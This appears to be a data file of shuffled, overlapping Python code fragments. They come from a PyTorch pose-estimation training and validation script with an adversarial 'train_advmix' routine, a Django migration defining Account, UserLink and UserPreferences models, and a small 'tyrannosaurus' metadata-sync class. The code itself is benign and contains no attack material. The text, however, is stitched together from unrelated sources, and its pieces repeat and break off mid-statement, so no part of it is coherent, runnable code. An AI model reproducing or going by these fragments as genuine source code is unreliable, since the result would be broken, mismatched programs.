from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back,", "[] filenames = [] imgnums = [] idx = 0 feat_dict = {}", "model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if isinstance(outputs, list):", "target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target,", ") writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list): for name_value in name_values:", "input, meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list):", "inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix + 
'_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4,", "and do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output = outputs", "= [] filenames = [] imgnums = [] idx = 0 feat_dict =", "# measure accuracy and record loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred =", "+ num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image'])", "for value in values]) + ' |' ) class AverageMeter(object): \"\"\"Computes and stores", "AverageMeter() acc = AverageMeter() if isinstance(models, list): model = models[0].train() model_G = models[1].train()", "tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() #", "copy.deepcopy(meta), target, pred*4, outputs, prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs,", "speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val,", "= accuracy(output, target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end)", "update step set_require_grad(model, False) optimizer_G.zero_grad() outputs = model(tmp) output = outputs loss_G =", "maxvals = get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :, 0:2]", "= 0 feat_dict = {} with torch.no_grad(): end = time.time() time_gpu = 0.", "{loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses,", "'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix + '_clean') save_debug_images(config, tmp,", "= 
requires_grad def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict):", "acc.avg, global_steps ) if isinstance(name_values, list): for name_value in name_values: writer.add_scalars( 'valid', dict(name_value),", "full_arch_name = full_arch_name[:8] + '...' logger.info( '| ' + full_arch_name + ' '", "4, output, prefix) print('=> The average inference time is :', time_gpu / len(val_loader))", "targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input =", "else: model.train() end = time.time() for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)):", "i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel =", "else: writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps + 1 return name_values,", "not isinstance(nets, list): nets = [nets] for net in nets: if net is", "isinstance(outputs, list): output = outputs[-1] else: output = outputs if config.TEST.FLIP_TEST: input_flipped =", "all_boxes parts all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx + num_images, 2:4]", "The average inference time is :', time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate(", "num_samples = len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32 ) all_boxes =", "data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(model, list): model", "'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps", "# ------------------------------------------------------------------------------ # Copyright (c) Microsoft # Licensed under the MIT License. 
#", "target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel'] > 0.5", "= AverageMeter() acc = AverageMeter() if isinstance(models, list): model = models[0].train() model_G =", "data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs", "if isinstance(outputs, list): output = outputs[-1] else: output = outputs if config.TEST.FLIP_TEST: input_flipped", "import numpy as np import torch from core.evaluate import accuracy from core.inference import", "15: full_arch_name = full_arch_name[:8] + '...' logger.info( '| ' + full_arch_name + '", "step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and record loss losses.update(loss.item(), input.size(0)) _,", "= \\ output_flipped.clone()[:, :, :, 0:-1] output = (output + output_flipped) * 0.5", "param.requires_grad = requires_grad def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir,", "+ output_flipped) * 0.5 if not cpu: target = target[0].cuda(non_blocking=True) target_hm = target", "all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] = s[:,", "model_D = model[1].train() else: model.train() end = time.time() for i, (input, target, target_weight,", "+ 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs,", "AverageMeter() acc = AverageMeter() if isinstance(model, list): model = model[0].train() model_D = model[1].train()", "License. # Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import from", "for name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid', dict(name_values)," ]
[ "b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'),", "class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ] operations = [ migrations.CreateModel(", "(b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])), ('donation_link', models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100,", "blank=True)), ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserLink', fields=[ ('id',", "only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric and - _ characters", "(b'github', b'GitHub')])), ('value', models.CharField(help_text='Write your username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. 
]*$',", "take up to 24 hours to update your location on the map.', max_length=200,", "models, migrations import django.db.models.deletion from django.conf import settings import django.core.validators class Migration(migrations.Migration): dependencies", "verbose_name='ID', blank=True)), ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserLink', fields=[", "from __future__ import unicode_literals from django.db import models, migrations import django.db.models.deletion from django.conf", "fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests", "import settings import django.core.validators class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ]", "you tweet/stream/post about Glee?', choices=[(0, 'Never'), (1, 'Sometimes'), (2, 'Often'), (3, 'Every single", "choices=[(0, 'Never'), (1, 'Sometimes'), (2, 'Often'), (3, 'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)),", "('longitude', models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol", "(1, 'Sometimes'), (2, 'Often'), (3, 'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={", "models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the settings icon, then", "b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam',", "to update your location on the map.', max_length=200, null=True, 
verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)),", "models.CharField(help_text='Write your username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric and", "you want. You can add formatting and links using Markdown.', null=True, verbose_name='Description', blank=True)),", "want. You can add formatting and links using Markdown.', null=True, verbose_name='Description', blank=True)), ('location',", "-*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations", "Your ID is the number you see on top of the window.', null=True,", "verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'),", "then tap \"Profile\". Your ID is the number you see on top of", "the number you see on top of the window.', null=True, verbose_name='ID', blank=True)), ('owner',", "max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. ]*$', b'Only alphanumeric and - _ characters are allowed.')])), ('relevance',", "username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\\\. 
]*$', b'Only alphanumeric and - _", "max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand',", "('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'),", "name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('description', models.TextField(help_text='Write whatever you want. You", "map.', max_length=200, null=True, verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True, blank=True)),", "choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])), ('device', models.CharField(help_text='The modele of your device. 
Example: Nexus 5,", "Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the settings", "are allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post about Glee?', choices=[(0, 'Never'),", "models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your", "('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the settings icon,", "django.db import models, migrations import django.db.models.deletion from django.conf import settings import django.core.validators class", "models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False,", "'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences',", "blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)), ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)),", "_ characters are allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post about Glee?',", "('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), 
(b'schoolidolu', b'School Idol Tomodachi'),", "choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])),", "choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol", "('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find", "'One hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank',", "tap the settings icon, then tap \"Profile\". Your ID is the number you", "blank=True)), ('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])), ('device', models.CharField(help_text='The modele", "Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])),", "verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'),", "auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School", "hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)),", "]*$', b'Only alphanumeric and - _ characters are allowed.')])), ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often", "the map.', 
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations
import django.db.models.deletion
from django.conf import settings
import django.core.validators


class Migration(migrations.Migration):
    """Create the Account, UserLink and UserPreferences tables.

    Auto-generated schema migration; depends on the initial `web`
    migration and on whichever model is configured as AUTH_USER_MODEL.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('web', '0001_initial'),
    ]

    operations = [
        # In-game account owned by a site user (one user may have several).
        migrations.CreateModel(
            name='Account',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)),
                ('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])),
                ('device', models.CharField(help_text='The modele of your device. Example: Nexus 5, iPhone 4, iPad 2, ...', max_length=150, null=True, verbose_name='Device', blank=True)),
                ('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])),
                ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')),
                ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)),
                ('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the settings icon, then tap "Profile". Your ID is the number you see on top of the window.', null=True, verbose_name='ID', blank=True)),
                ('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        # External/social profile link attached to a user.
        migrations.CreateModel(
            name='UserLink',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])),
                ('value', models.CharField(help_text='Write your username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\. ]*$', b'Only alphanumeric and - _ characters are allowed.')])),
                ('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post about Glee?', choices=[(0, 'Never'), (1, 'Sometimes'), (2, 'Often'), (3, 'Every single day')])),
                ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        # One-to-one profile/preferences record per user.
        migrations.CreateModel(
            name='UserPreferences',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('description', models.TextField(help_text='Write whatever you want. You can add formatting and links using Markdown.', null=True, verbose_name='Description', blank=True)),
                ('location', models.CharField(help_text='The city you live in. It might take up to 24 hours to update your location on the map.', max_length=200, null=True, verbose_name='Location', blank=True)),
                ('location_changed', models.BooleanField(default=False)),
                ('latitude', models.FloatField(null=True, blank=True)),
                ('longitude', models.FloatField(null=True, blank=True)),
                ('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])),
                ('donation_link', models.CharField(max_length=200, null=True, blank=True)),
                ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)),
                # SET_NULL keeps the preferences row if the performer is deleted.
                ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)),
                ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)),
                ('user', models.OneToOneField(related_name='preferences', to=settings.AUTH_USER_MODEL)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
Your ID is the number you see on", "models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'),", "friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id', models.PositiveIntegerField(help_text='To find your ID,", "settings import django.core.validators class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ] operations", "iPhone 4, iPad 2, ...', max_length=150, null=True, verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True, max_length=30, null=True,", "verbose_name='Location', blank=True)), ('location_changed', models.BooleanField(default=False)), ('latitude', models.FloatField(null=True, blank=True)), ('longitude', models.FloatField(null=True, blank=True)), ('status', models.CharField(max_length=12, null=True,", "fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)), ('os', models.CharField(default=b'iOs', max_length=10,", "bases=(models.Model,), ), migrations.CreateModel( name='UserLink', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform',", "whatever you want. 
You can add formatting and links using Markdown.', null=True, verbose_name='Description',", "migrations.CreateModel( name='UserLink', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'),", "(3, 'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel(", "'Ultimate Idol Devotee')])), ('donation_link', models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans',", "modele of your device. Example: Nexus 5, iPhone 4, iPad 2, ...', max_length=150,", "fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank',", "Markdown.', null=True, verbose_name='Description', blank=True)), ('location', models.CharField(help_text='The city you live in. 
It might take", "b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])), ('value', models.CharField(help_text='Write your username", "null=True)), ('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)), ('user', models.OneToOneField(related_name='preferences', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), ]", "models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True, blank=True)), ('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)), ('following',", "day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='UserPreferences', fields=[ ('id',", "= [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('web', '0001_initial'), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id',", "migrations.CreateModel( name='UserPreferences', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('description', models.TextField(help_text='Write whatever you want.", "name='Account', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)), ('os', models.CharField(default=b'iOs',", "] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nickname',", "(b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'),", "'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])), ('donation_link', 
models.CharField(max_length=200, null=True, blank=True)), ('donation_link_title', models.CharField(max_length=100, null=True,", "(b'Other', 'Other')])), ('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')), ('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)), ('account_id',", "null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER',", "verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])), ('device', models.CharField(help_text='The modele of your device. Example:", "2, ...', max_length=150, null=True, verbose_name='Device', blank=True)), ('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs',", "(b'youtube', b'YouTube'), (b'github', b'GitHub')])), ('value', models.CharField(help_text='Write your username only, no URL.', max_length=64, verbose_name='Username/ID',", "# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models,", "'Never'), (1, 'Sometimes'), (2, 'Often'), (3, 'Every single day')])), ('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)), ],", "b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github'," ]
[ "set version = \"' + str(self.context.version) + '\" %}'}, ) __all__ = [\"Sync\"]", "= \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"), {\"{%", "/ self.context.project / \"__init__.py\", { \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ =", "{ \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format(", "self.context.back_up(path) new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items():", "import _Context logger = logging.getLogger(__package__) class Sync: def __init__(self, context: _Context, dry_run: bool):", "key: str): return self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None:", "def sync(self, path: Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return", "Sync: def __init__(self, context: _Context, dry_run: bool): self.context = context self.dry_run = dry_run", "\": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__", "Path from typing import Sequence, Mapping from tyrannosaurus.context import _Context logger = logging.getLogger(__package__)", "\"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__ =", "path: Path, replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines = [] for line", "k, v in replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines)", "\"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def 
fix_init(self) -> None:", "\"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self)", "__future__ import annotations import logging from pathlib import Path from typing import Sequence,", "dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s in context.targets] def has(self, key: str):", "'{% set version = \"' + str(self.context.version) + '\" %}'}, ) __all__ =", "def has(self, key: str): return self.context.has_target(key) def replace_substrs(self, path: Path, replace: Mapping[str, str])", "def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", {", "-> None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", { \"__status__ =", "line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if not self.dry_run: path.write_text(new_lines, encoding=\"utf8\")", "self.dry_run: path.write_text(new_lines, encoding=\"utf8\") logger.debug(\"Wrote to {}\".format(path)) def fix_init(self) -> None: if self.has(\"init\"): self.replace_substrs(", "context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe() return [str(s) for s in context.targets] def", "version = \": '{% set version = \"' + str(self.context.version) + '\" %}'},", "\"__init__.py\", { \"__status__ = \": '__status__ = \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ =", "dry_run def sync(self, path: Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init() self.fix_recipe()", "\": '__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs(", "replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None: self.context.back_up(path) new_lines = 
[] for", "in path.read_text(encoding=\"utf8\").splitlines(): for k, v in replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line)", "None: if self.has(\"init\"): self.replace_substrs( self.context.path / self.context.project / \"__init__.py\", { \"__status__ = \":", "'__date__ = \"{}\"'.format(self.context.source(\"date\")), }, ) def fix_recipe(self) -> None: if self.has(\"recipe\"): self.replace_substrs( self.context.path_source(\"recipe\"),", "\": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \": '__date__ = \"{}\"'.format(self.context.source(\"date\")), },", "None: self.context.back_up(path) new_lines = [] for line in path.read_text(encoding=\"utf8\").splitlines(): for k, v in", "from __future__ import annotations import logging from pathlib import Path from typing import", "= \"{}\"'.format(self.context.source(\"status\")), \"__copyright__ = \": '__copyright__ = \"{}\"'.format( self.context.source(\"copyright\") ), \"__date__ = \":", "import Path from typing import Sequence, Mapping from tyrannosaurus.context import _Context logger =", "__init__(self, context: _Context, dry_run: bool): self.context = context self.dry_run = dry_run def sync(self,", "return [str(s) for s in context.targets] def has(self, key: str): return self.context.has_target(key) def", "v in replace.items(): if line.startswith(k): new_lines.append(v) break else: new_lines.append(line) new_lines = \"\\n\".join(new_lines) if", "for s in context.targets] def has(self, key: str): return self.context.has_target(key) def replace_substrs(self, path:", "= dry_run def sync(self, path: Path) -> Sequence[str]: context = _Context(path, dry_run=self.dry_run) self.fix_init()", "Sequence, Mapping from tyrannosaurus.context import _Context logger = logging.getLogger(__package__) class Sync: def __init__(self,", "_Context, dry_run: bool): self.context = context self.dry_run = dry_run def sync(self, path: Path)", "self.context.path / 
